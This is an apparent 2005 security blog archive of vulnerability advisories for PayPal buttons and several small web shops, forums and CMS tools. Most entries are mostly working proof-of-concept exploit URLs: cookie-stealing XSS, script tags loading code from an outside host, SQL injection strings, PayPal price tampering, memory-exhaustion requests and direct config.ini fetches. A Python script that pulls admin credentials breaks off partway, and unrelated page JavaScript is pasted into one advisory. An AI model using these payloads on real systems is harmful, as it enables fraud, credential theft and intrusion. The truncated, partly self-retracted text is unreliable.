PayPal arbitrary price manipulation

Monday, May 30, 2005
##############################################
PayPal 'butons' price manipulation.
vendor url:https://www.paypal.com/
http://lostmon.blogspot.com/2005/05/
paypal-arbitrary-price-manipulation.html
vendor notify: yes exploit available: yes
Discovered by FalconDeOro(1) and Lostmon(2)
##############################################

PayPal buttons are prone to price manipulation.
all stores based on PayPal buttons are posible
vulnerables to this flaw.


##########################
code example of a button
##########################
the proof is based on this form:

https://www.paypal.com/us/cgi-bin/webscr?cmd=p/xcl/rec/options-help-outside

in the exmple of explotation we used "PayPal price manipulation kit " program to shop.
This is Non existent product...

the link of the button for shopping have this url:
(1)
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick
&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+ kit&item_number=1&amount=19.90&no_shipping=1&return
=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15


this is the normal price for the product (19.90$) but...
if we change 'amount' variable to 0.01 the product now cost 0.01$

https://www.paypal.com/cgi-bin/webscr?cmd=_xclick
&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+ kit&item_number=1&amount=0.01&no_shipping=1&return
=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15

another way to exploiting this situation:

(2)
this other example coming from a stored based on paypal:

https://www.paypal.com/cart/add=1&business=[EMAIL-Bussines]
&item_name=PayPal+price+manipulation+ kit&item_number=
7&return=[SITE SUBMIT]&cancel_return=[SITE RETURN]&amount=[PRICE]&shipping=0
&shipping2=0&handling=0&rm=2&custom=1¤cy_code=USD

if we look we can change not only the price , we can change the email account
name of product, and other details.
for shopping you need an account on PayPal.

#############
timeline:
#############

discovered: 14 may 2005
vendor notify: 25 may 2005
Vendor response: 26 may 2005
disclosure: 27 may 2005
Public disclosure: 30 may 2005


################### End ####################

thnx to estrella to be my ligth
thnx to icaro he is my support
Thnx to FalconDeOro ... patience.
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!

contact to FalconDeOro
(falcondeoro@gmail.com)
http://falcondeoro.blogspot.com

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente

Quick Cart Search field cross site scripting and script insercion

Sunday, May 29, 2005
#####################################################
Quick Cart Search field cross site scripting and script insercion
vendor url:http://www.quickcart.com/
advisore:http://lostmon.blogspot.com/2005/05/
quick-cart-search-field-cross-site.html
vendor notify: yes exploit available: yes
Securitytracker:1014076
#####################################################

Quick Cart contains a flaw that allows a remote cross
site scripting attack.This flaw exists because the
application does not validate the 'search' field upon
submission to 'search.cfm' script.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.


############
versions
############

free edition affected:
https://www.quickcart.com/qc_checkout.cfm


but is posible other versions ( standar or others) are afected


################
solution
################

no solution was available at this time

#############
Timeline
#############

discovered: 10 may 2005
vendor notify: 27 may 2005
vendor response: 27 may 2005
disclosure: 29 may 2005

##############
exploit
##############

put in the search box of the store:

//"><script>alert(document.cookie)</script>

or

//"><SCRIPT src="http://www.drorshalev.com/dev/injection/js.js"></script>

and the script is executing , this is a XSS flaw
and a posible script insercion


#################### €nd ###################

Thnx to http://www.drorshalev.com for this script
and for hosting it for this demostration.

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente

BookReview 1.0 multiple variable XSS

Wednesday, May 25, 2005
###################################################
BookReview 1.0 multiple variable XSS
vendor url:http://www.readersunite.com
advisore:http://lostmon.blogspot.com/2005/05/
bookreview-10-multiple-variable-xss.html
vendor notify: yes exploit available: yes
OSVDB ID:16871,16872,16873,16874,16875,16876,16877
16878,16879,16880,16881
BID:13783
Securitytracker: 1014058
###################################################

BookReview contains a flaw that allows a remote cross
site scripting attack.This flaw exists because the
application does not validate multiple variables upon
submission to multiple scripts.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.

############
versions:
############

BookReview beta 1.0 vulnerable.

##############
solution
##############

no solutions was available at this time

###########
timeline
###########

discovered: 27 april 2005
vendor notify 17 may 2005 (webform)
disclosure: 26 may 2005

##################
proof of concepts
###################

all files are submited to 'index.php' script by variable 'page' like
index.php?page=[NAME_OF_MODULE]&isbn=[NUMBER_OF_ISBN]
the name of module can be 'add_review' 'add_contents' or others

for example this url:
http://[victim]/index.php?page=add_contents
&isbn=083081423X&chapters=25

is the same of this :

http://[victim]/add_contents.htm?isbn=083081423X&chapters=25

whith this if you think we have two wais for exploiting this situation,
one whith the index.php and other directly by the module.

##################
add_review.htm
#################

http://[victim]/add_review.htm?isbn=0801052319&node=
%3Cscript%3Ealert(document.cookie)%3C/script%3E&review=true

http://[victim]/add_review.htm?isbn=0801052319
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script
%3E&node=Political_Science&review=true

http://[victim]/add_review.htm?isbn=0553278223&node=
"><script>alert(document.cookie)</script>&review=true

http://[victim]/add_review.htm?node=index&isbn=\"><script>alert(document.cookie)</script>

###################
index.php
###################

http://[victim]/index.php?page=add_contents&isbn=083081423X
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&chapters=25

http://[victim]/index.php?page=add_contents&isbn=083081423X
&chapters=25%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

NICE ERROR !!


; function tallyup() { var count = 0; var book = 0; var part = 0; var section = 0; var chapter = 0; var appendix = 0; var main_prefix = ""; var section_prefix = ""; for ( i=0; i var persian = '' + value; var roman=""; var ronumdashes=""; var buffer=10-persian.length; while (buffer>0) {persian="0"+persian;buffer--} var units=new Array("","I","II","III","IV","V","VI","VII","VIII","IX"); var tens=new Array("","X","XX","XXX","XL","L","LX","LXX","LXXX","XC"); var hundreds=new Array("","C","CC","CCC","CD","D","DC","DCC","DCCC","CM"); var thousands=new Array("","M","MM","MMM","MV","V","VM","VMM","VMMM","MX"); var billionsdashes=new Array("","=","==","===","==","=","==","===","====","=="); romandashes=billionsdashes[persian.substring(0,1)]; var hundredmillionsdashes=new Array("","=","==","===","==","=","==","===","====","=="); romandashes+=hundredmillionsdashes[persian.substring(1,2)]; var tenmillionsdashes=new Array("","=","==","===","==","=","==","===","====","=="); romandashes+=tenmillionsdashes[persian.substring(2,3)]; var millionsdashes=new Array("","_","__","___","_=","=","=_","=__","=___","_="); romandashes+=millionsdashes[persian.substring(3,4)]; var hundredthousandsdashes=new Array("","_","__","___","__","_","__","___","____","__"); romandashes+=hundredthousandsdashes[persian.substring(4,5)]; var tenthousandsdashes=new Array("","_","__","___","__","_","__","___","____","__"); romandashes+=tenthousandsdashes[persian.substring(5,6)]; var thousandsdashes=new Array("","","",""," _","_","_","_","_"," _"); romandashes+=thousandsdashes[persian.substring(6,7)]; roman=thousands[persian.substring(0,1)]; roman+=hundreds[persian.substring(1,2)]; roman+=tens[persian.substring(2,3)]; roman+=thousands[persian.substring(3,4)]; roman+=hundreds[persian.substring(4,5)]; roman+=tens[persian.substring(5,6)]; roman+=thousands[persian.substring(6,7)]; roman+=hundreds[persian.substring(7,8)]; roman+=tens[persian.substring(8,9)]; roman+=units[persian.substring(9,10)]; return roman; } function alphabetise(number) { return String.fromCharCode(64+number); } /// function submitconfirm() { var agree = document.getElementById('agree'); if ( !agree.checked ) { alert("You must indicate your agreement to the terms and conditions by checking the box provided."); return false; } return true; }


###################
add_contents.htm
###################


http://[victim]/add_contents.htm?isbn=083081423X
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/suggest_category.htm?node=Agriculture
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/contact.htm?user=admin
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/add_booklist.htm?node=Agriculture_and_Aqua
culture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


#########################
others.
#########################

http://[victim]/add_url.htm?node=
%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/search.htm?page=search&submit%5Bstring
%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29
%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author

http://[victim]/add_classification.htm?isbn=0830815961
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Gospels

http://[victim]/suggest_review.htm?node=Business_and_Economics
"><script>alert(document.cookie)</script>

############################
posible local fle inclusion
############################

http://[victim]/suggestions/"><
script>alert(document.cookie)</script> .htm

http://[victim]/directory/">%3Cscript%3
Ealert(document.cookie)%3C/script%3E.htm



################
path disclosure:
################

http://[victim]/search.htm?page=search&submit%5Bstring%
5D=&submit=Ok&submit%5Btype%5D=auth
or

http://[victim]/search.htm?page=search&submit%5
Bstring%5D=&submit%5Btype%5D=title

######################## €nd ########################

thnx to estrella to be my ligth
Thnx to icaro he is my Shadow !!!
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente

Spread The Word multiple XSS and SQL injections

Tuesday, May 24, 2005
####################################################
Spread The Word (comersus based bookstore ) multiple
script and variables XSS and SQL Injections vulnerabilities.
vendor url:http://www.stwm.com/opportunity.asp
advisore url:http://lostmon.blogspot.com/2005/05/
spread-word-multiple-xss-and-sql.html
vendor notified:yes exploit available: yes
BID:13733 and 13737
####################################################

Spread The Word (comersus based bookstore ) contains a flaw that
allows a remote cross site scripting attack.This flaw exists because
the application does not validate multiple variables upon submission
to multiple scripts.This could allow a user to create a specially
crafted URL that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server,
leading to a loss of integrity.


##############
versions:
##############

I can´t established what version are affected.

##############
solution:
##############

no solution was available at this time.

##############
timeline
##############

discovered: 17 oct 2004
vendor notify: 08 april 2005
vendor response: 11 april 2005
disclosure: 24 may 2005



####################
proof of concepts:
####################

Some files have diferent prefix like STW
ej: 'ShowContent.asp' in others stores are 'STWShowContent.asp'

#####################
BrowseCategories.asp
#####################

XSS,sql errors and path disclosure.


http://[target]/store/BrowseCategories.asp?Cat0=783&
Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible[XSS-here]

http://[target]/store/BrowseCategories.asp?Cat0=783
&Cat0Literal=Gifts&Cat1=839[XSS-here]&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783
&Cat0Literal=Gifts[XSS-here]&Cat1=839&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783[XSS-here]
&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783[SQL-INJECTION]
&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible

http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=
Gifts&Cat1=839[SQL-INJECTION]&Cat1Literal=Bible

Cat0literal can be books, videos,gifts,bibles,or other categories similars listed in the cart.

#############
search.asp
#############

XSS,sql errors and path disclosure.

http://[target]/store/Search.asp?SearchType=565
[SQL-INJECTION]&strSearch=lalala

http://[target]/store/Search.asp?InStock=[XSS-here]
&SearchType=783&strSearch=i&SearchCat1=-1&SearchCat2=
-1&PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=
783&strSearch=[XSS-here]&SearchCat1=-1&SearchCat2=
-1&PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=lol&SearchCat1=-1[XSS-here]&SearchCat2=-1
&PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=lol&SearchCat1=-1&SearchCat2=-1[XSS-here]&
PriceMin=&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=
[XSS-here]&PriceMax=&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=
&PriceMax=[XSS-here]&PublicationDate=-1

http://[target]/store/Search.asp?InStock=&SearchType=783
&strSearch=1&SearchCat1=-1&SearchCat2=-1&PriceMin=
&PriceMax=&PublicationDate='

##################
AdvancedSearch.asp
##################

http://[target]/store/AdvancedSearch.asp?strSearch=
[XSS-CODE]&SearchType=-1&SearchCat1=-1&SearchCat2=
-1&Author=dd&PublicationDate=-1&PriceMin=1&PriceMax=
111111111&B1=Submit


##################
ViewItem.asp
##################

XSS,sql errors and path disclosure.

http://[target]/store/ViewItem.asp?ISBN=
0789906651[XSS-here]&Cat0=565

http://[target]/store/ViewItem.asp?ISBN=
0789906651&Cat0=565[XSS-here]

http://[target]/store/ViewItem.asp?ISBN=
0789906651[SQL-INJECTION]&Cat0=565

http://[target]/store/ViewItem.asp?ISBN=0789906651
&Cat0=565[SQL-INJECTION]



####################
STWShowContent.asp
###################
XSS ,sql errors and path disclosure.


http://[target]/store/STWShowContent.asp?
idRightPage=13032[XSS-CODE]

http://[target]/store/STWShowContent.asp?
idRightPage=13032[SQL-INJECTION]

http://[target]/store/STWShowContent.asp

###################
MySide.Asp
###################
XSS,sql errors and path disclosure.


http://[target]/store/MySide.Asp?Cat0=565
&Cat0Literal=Bibles[XSS-CODE]

http://[target]/store/MySide.Asp?Cat0=565
[SQL-INJECTION]&Cat0Literal=Bibles

#################
BrowseMain.asp
#################
XSS ,sql errors and path disclosure.

http://[target]/store/BrowseMain.asp?Cat0=565
[XSS-CODE]&Cat0Literal=Bibles&CurHigh=4

http://[target]/store/BrowseMain.asp?Cat0=565
&Cat0Literal=Bibles[XSS-CODE]&CurHigh=4

http://[target]/store/BrowseMain.asp?Cat0=565
[SQL-INJECTION]&Cat0Literal=Bibles&CurHigh=4

http://[target]/store/BrowseMain.asp?Cat0=783
&Cat0Literal=Gifts&CurHigh=3"><
script>alert(document.cookie)</script>

################
others
################
XSS

http://[target]/store/NewCustomer.asp?newemail=
zzzz@lalala.es&RedirectURL=[XSS-CODE]

http://[target]/store/Login.asp?RedirectURL=[XSS-code]

Also it´s posible to we can inject sql or XSS code in 'Cat0' variable
or 'Cat1' in all files where this variables are used.

Also it´s posible to we can inject XSS code in 'Cat0literal' variable
or 'Cat1literal' in all files where this variables are used.

################### End ################

thnx to estrella to be my ligth
Thnx to icaro he is my Shadow !!!
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente

A thought...

Saturday, May 21, 2005
It can that is not so good idea to share what it is known.
The crude reality, unfortunately often surpasses the fiction...

:X

TOPo 2.2 multiple variable & fields XSS and information disclosure

Friday, May 20, 2005
#######################################################
TOPo 2.2 multiple variable & fields XSS and information disclosure
vendor url:http://ej3soft.ej3.net/index.php?m=info&s=topo&t=info
advisore: http://lostmon.blogspot.com/2005/05/
topo-22-multiple-variable-fields-xss.html
vendor notified: yes exploit available: yes.
OSVDB ID:16699 and 16700
secunia:SA15325
Securitytracker:1014016
BID:13700 and 13701
#######################################################

TOPo is a free TOP system written in PHP that works
without MySQL database.TOPo is specially designed for
web sites hosted in web servers that not offer a
quality MySQL support.

TOPo contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application
does not validate 'm','s','ID','t' and possible other parameters
upon submission to the 'index.php'script.This could allow a user
to create a specially crafted URL that would execute arbitrary
code in a user's browser within the trust relationship between
the browser and the server,leading to a loss of integrity.

TOPo contains a flaw too that allow remote users to information
disclosure. All data are stored in '/data/' folder and all *.dat
files store all votes, comments and other information about the
site on top. Any user can download this files and obtain all
client ip address(all clients who are vote or added a comment)

################
software use:
###############

Microsoft Windows 2000 [Version 5.00.2195] all fixes.
Internet explorer 6.0 sp1 all fixes.
Netcraft toolbar 1.5.6 ( detects all attacks XSS in this case :D)
Google toolbar 2.0.114.9-big/es

###########
versions:
###########

TOPo v2.2.178 vulnerable.

##############
solution
##############

no solution was available at this time.

############
time line
############

discovered: 13 may 2005
vendor notify: 19 may 2005
vendor response:
vendor fix:
disclosure: 20 may 2005

######################
Proof of concepts XSS
######################

http://[victim]/topo/index.php?m=top">
<SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js>
</script>&s=info&ID=1114815037.2498

http://[victim]/topo/index.php?m=top&s=info&ID=1115946293.3552
"><SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js>
</SCRIPT>&t=puntuar

http://[victim]/topo/index.php?m=top&s=info">
<script>alert()</script>&ID=1115946293.3552&t=puntuar

http://[victim]/topo/index.php?m=top">
<script>alert()</script>&s=info&ID=1115946293.3552&t=puntuar

http://[victim]/topo/index.php?m=top&s=info&t=comments&ID=
1114815037.2498"><SCRIPT%20src=http://www.drorshalev.com/dev/
injection/js.js></script>

http://[victim]/topo/index.php?m=top&s=info&t=comments&paso=1
&ID=1111068112.7598"><SCRIPT%20src=http://www.drorshalev.com/dev
/injection/js.js></script>

http://[victim]/topo/index.php?m=members&s=html&t=edit"><SCRIPT
%20src=http://www.drorshalev.com/dev/injection/js.js></script>

#########################

Wen try to added a new comment some fields are vulnerable
to XSS style attacks.

http://[victim]/top/index.php?m=top&s=info&t=comments
&paso=1&ID=1115946293.3552

field name vulnerable, Your web field vulnerable and
your email field are vulnerable.

##################
example of js.js
##################

Thnx to http://www.drorshalev.com for this script and for hosting it
for this demostration.

#################
js.js
#################

function showIt(){
document.body.innerHTML="<a href='javascript:alert(document.cookie)
'><center><b>Your PC Can be hacked Via "+ document.domain
+" XSS ,Html Injection to a Web Site"+document.domain +" By
DrorShalev.com<br></b><br><img border=0 src=
'http://sec.drorshalev.com/dev/injection/lig.gif' width=60 HEIGHT=60
><img src='http://www.drorshalev.com/dev/injection/gif.jpg.asp'
border=1><br></center></a>"+
document.body.innerHTML window.status="Your PC Can be hacked Via
"+ document.domain +" XSS ,Html Injection to a Web Site "
+document.domain +" By DrorShalev.com" setTimeout
("window.open('view-source:http://sec.drorshalev.com/dev/
injection/xss.txt')",6000);
}
setTimeout("showIt()",2000);

################
data disclosure
################

http://[victim]/data/

################ EnD #####################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
Thnx to http://www.drorshalev.com and dror
for his script and for hosting it !!!!
thnx to all who day after day support me !!!

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente....

Spymac Web os 3.0 Abuse server´s memory and path disclose

Saturday, May 14, 2005
#########################################################
Spymac Web os 3.0 Abuse server´s memory and path disclose
vendor url:http://www.spymac.com/network.php?p=webos&wwg=20
Vendor notified : yes exploit avaible : yes
Original advisore:http://lostmon.blogspot.com/2005/05/
spymac-web-os-30-abuse-servers-memory.html
vendor notfy: yes exploit available : yes
########################################################

Spymac is powered by an integrated collection of applications
(developed in-house)that together form "Spymac WOS". Spymac
WOS is an intelligent environment featuring patent-pending
technology that allows for the creation of an immersive and
visually-stunning Web experience.


This flaw exists because the application does not validate 'c'
parameter upon submission to script.This could allow a user
to create a specially crafted URL that would consume all
memory on the server and reveals the path instalation of the
aplication,leading to a Denial Of Service and lost of integrity.

###############
versions
################

Spymac Webos 3.0 beta 190

################
solution
################

no solution at this time.

###############
timeline
###############

discovered: 11 april 2005
vendor notify: 12 april 2005
vendor response: none
Disclosure on Spymac bug forum :12 april 2005
Public disclosure: 14 may 2005


############################################
Full path disclosure and abuse of the memory
############################################

http://www.spymac.com/forums/showthread.php?threadid=134134&c=
900000000000000000000000000000

Fatal error: Maximum execution time of 120 seconds exceeded in /var/www/[victim]/classes/global_class.inc on line 770

--

with negative number:

http://[victim]/forums/showthread.php?threadid=134134&c=
-900000000000000000000000000000

Fatal error: Allowed memory size of 67108864 bytes exhausted
(tried to allocate 3840 bytes) in
/var/www/[victim]/classes/global_class.inc(201) :
regexp code on line 1

################### End #######################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente

Quick.Forum 'topic field' XSS and 'page' & 'iCategory' SQL injection

Tuesday, May 10, 2005
#######################################################
Quick.Forum 'topic field' XSS and 'page' & 'iCategory' SQL injection
vendor url:http://qc.dotgeek.org/os/index.php
advisore:http://lostmon.blogspot.com/2005/05/
quickforum-topic-field-xss-and-page.html
vendor notify: yes exploit available: yes
OSVDB ID:16326, 16327, 16328 , 16329
Secunia: SA15200
BID:13602
######################################################

Quick.Forum contais a flaw which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks.

Input passed to the "topic" field in "index.php" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML, script code and in a user's browser session in context of a vulnerable site.

Input passed to the "iCategory" and "page" variables in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code


########
versions
########

2.1.6 afected

It is posible to prior versions are vulnerable too.

#############
solution
#############

no solution available at this time

#########
timeline
#########

discovered:28 april 2005
vendor notify: 10 may 2005 (webform)
vendor response:
vendor fix:
disclosure:11 mayo 2005

##################
proof of comcepts
##################
###############
SQL injections
###############

http://[victim]/forum/index.php?p=&iCategory=3%20or%201=1

http://[victim]/forum/index.php?p=topicsList&page=4%20or%201=1

http://[victim]/forum/?p=&iCategory=2%20or%201=1

########
XSS
########

http://[victim]/forum/?p=newTopic // topic field are vulnerable to XSS


################
some information
################

non important information , not need password to post

http://[victim]/forum/db/users.txt //show all users of forum.

http://[victim]/forum/db/banList.txt //list of all IP banned

http://[victim]/forum/db/censureWords.txt //all censured words

the backup of the database are stored in
http://[victim]/forum/backup/qf20050509.tar.bz2
and the file have the same name of the date was made the backup,
it can download directly ,but need to know the name of the file :P


###################### End ################

thnx to estrella to be my ligth
Thnx to icaro he is my Shadow !!!
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente

Quick.cart 'sWord' variable XSS and 'iCategory' SQL injection

####################
UPDATED 19-07-2005
####################

THIS ADVISORY IS INCORRECT , Quick.cart DON´T HAVE ANY
SQL DATABASE = NO SQL QUERIES = NO SQL INJECTION.

AND THE XSS FLAW ARE SOLVED IN Quick.Cart v0.3.1

OSVDB ID:16331

########################################################



#########################################################
Quick.cart 'sWord' variable XSS and 'iCategory' SQL injection
vendor url:http://qc.dotgeek.org/os/index.php
advisore:http://lostmon.blogspot.com/2005/05/
quickcart-sword-variable-xss-and.html
vendor notify: yes exploit available: yes
OSVDB ID: 16330 and 16331
Secunia: SA15297
BID:13599
##########################################################

Quick.cart contais a flaw which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks.

Input passed to the "sWord" variable in "index.php" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML, script code and in a user's browser session in context of a vulnerable site.

Input passed to the "iCategory" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code



########
versions
########

0.3.0 afected


#############
solution
#############

no solution available at this time

#########
timeline
#########

discovered:28 april 2005
vendor notify: 10 may 2005 (webform)
vendor response:
vendor fix:
disclosure: 11 may 2005

##################
proof of comcepts
##################
#####################
Cross site scripting
#####################

http://[victim]/?p=productsList&sWord=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/index.php?p=productsList&sWord=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

##############
sql injection:
##############

http://[victim]/?p=productsList&
iCategory=7%20or%201=1

http://[victim]/index.php?p=productsList&
iCategory=7%20or%201=1


############### End #####################


thnx to estrella to be my ligth
Thnx to icaro He is my Shadow ;P
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente....

NukeET 'codigo' variable cross site scripting

################################################
NukeET 'codigo' variable cross site scripting
vendor url:http://www.truzone.org
advisore:http://lostmon.blogspot.com/2005/05/
nukeet-codigo-variable-cross-site.html
Vendor confirmed : yes exploit available: yes
OSVDB ID:16214
Secunia:15332
BID:13570
Securitytracker:1013936
#################################################

NukeET Contains a flaw too that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'codigo' variable upon submission to the 'security.php'scripts.This
could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a loss
of integrity.

bug found by Suko , investigate and reporter by Lostmon.

##########
versions
##########

prior to 3.2 afected

##########
solution:
##########

vendor patch

http://www.truzone.org/modules.php?name=Projet&op=getit&iddow=77

###########
timeline
###########

discovered: 9 may 2005
vendor notify: 9 may 2005
vendor response : 10 may 2005
vendor fix: 10 may 2005
disclosure: 10 may 2005


##########
exploit:
##########

'codigo' variable acepts base64 url encode ,
if we encode for example:

<script>alert()</script><h1>XSS PoW@ !!!</h1>

in base64 this is:

PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+
PGgxPlhTUyBQb1dAICEhITwvaDE+

if we aded this base64 code the alert and de tag h1
is executed with any problem.
http://[victim]/security.php?codigo=
PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+
PGgxPlhTUyBQb1dAICEhITwvaDE+


################ End ##################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
thnx to Suko "la paciencia es una virtud pekeño Jedy"

--
atentamente:

Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente....

CodeThat ShoppingCart Critical information disclosure

Sunday, May 08, 2005
##########################################################
CodeThat ShoppingCart Critical information disclosure
XSS and SQL injection
vendor Url: http://www.codethat.com/shoppingcart/
advisore:http://lostmon.blogspot.com/2005/05/
codethat-shoppingcart-critical.html
vendor notifY: yes exploit available: yes
Discovered By Lostmon And icaro exploit code by icaro
OSVDB ID: 16155 , 16156 and 16157
Secunia:SA15251
BID:13560
Securitytracker:1013924
###########################################################

CodeThat ShoppingCart contains a flaw that may lead to an
unauthorized disclosure of SQL conection data.It is possible
to gain access to plain text SQL configuration details, this
could allow a user to create a specially crafted URL to access
'config.ini' file, which may lead to a loss of confidentiality.
This flaw reveals too the admin´s username and his password
hash.(automated exploit available) and the credential for
configuration of SMTP server.

Contains a flaw too that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'id' variables upon submission to the catalog.php scripts.This
could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a loss
of integrity.

All flaws are found by Lostmon (lostmon@gmail.com)
and icaro (icaro0@gmail.com)and exploit code is coded
by icaro from http://www.badchecksum.tk

##########
versions:
##########

1.3.1

###########
Solution
###########

no solution at this time

############
Timeline
############

discovered: 6 may 2005
vendor notify: 7 mayo 2005
vendor response: 8 mayo 2005 (automated response form spamarrest)
vendor fix
disclosure: 9 may 2005

##########
examples:
####################
Cross site scripting
####################

http://[victim]/codethat/catalog.php?action=category_show
&id=2"><script>alert(document.cookie)</script>

###############
SQL injections
###############

http://[victim]/shoppingcart/catalog.php?action=category_show
&id=1%20or%20like%20%60a%%60

nice SQL error/response ...

umm them try to list all products:

http://[victim]shoppingcart/demo/catalog.php?action=
category_show&id=1%20or%201=1

command execution sucesfully !!!!

aparently, non critical SQL injection ,the data base only have
tree tables and no passwords or other information are stored
in the database.


##############################
Critical information disclosure
Exploit code include.
###############################

A remote user can access directly to SQL user name, password
host, and all details about SQL configuration.

A remote user can access Directly to admin´s user name and password hash.


http://[victim]/shoppingcart/config.ini

##############################
Critical information disclosure.
###############################

A remote user can access directly to SQL user name, password
host, and all details about SQL configuration.

A remote user can access Directly to admin´s user name and password hash.

A remote user can obtain information about SMTP configuration.

http://[victim]/shoppingcart/config.ini

#############################################
Proof of concept automated exploit in Python
exploit url:www.badchecksum.tk/code/shopingfuck.py
#############################################

# Lostmon Dismarking tm && icaro Badchecksum tm
# Extract information tool exploit
# Coded by icaro, Discovered by lostmon && icaro
import httplib
import sys
import string
import socket
import os
def uso():
print '\n\n\nLOSTMON DISMARKING && ICARO BADCHECKSUM TEAM\n'
print 'Usage: python ' + sys.argv[0] + ' host /directory_of_shoping_cart/\n'
print 'Example: python '+ sys.argv[0] +' www.myhost.com /shoping/\n'
def leeini(direccionweb,directorioshoping):
web=httplib.HTTP(direccionweb)
web.putrequest('GET',directorioshoping+'config.ini')
web.putheader('Host',direccionweb)
web.putheader('Accept', 'text/html')
web.putheader('Accept', 'text/plain')
web.endheaders()
errcode, errmsg, headers = web.getreply()
fichero=web.getfile()
datos=fichero.read()
f=open('tmp.txt','w')
f.write(datos)
f.close
f=open('tmp.txt','r')
lineas=f.readlines()
f.close
n=0
print 'EXTRACCION DE PASSWD DE ADMIN SHOPING CART\n'
while n if (string.find(lineas[n],'admin_username'))==0:
imprime=string.replace(lineas[n],'admin_username : string ','Login ')
print imprime
if (string.find(lineas[n],'admin_password'))==0:
imprime=string.replace(lineas[n],'admin_password : string ','Passwd ')
print imprime
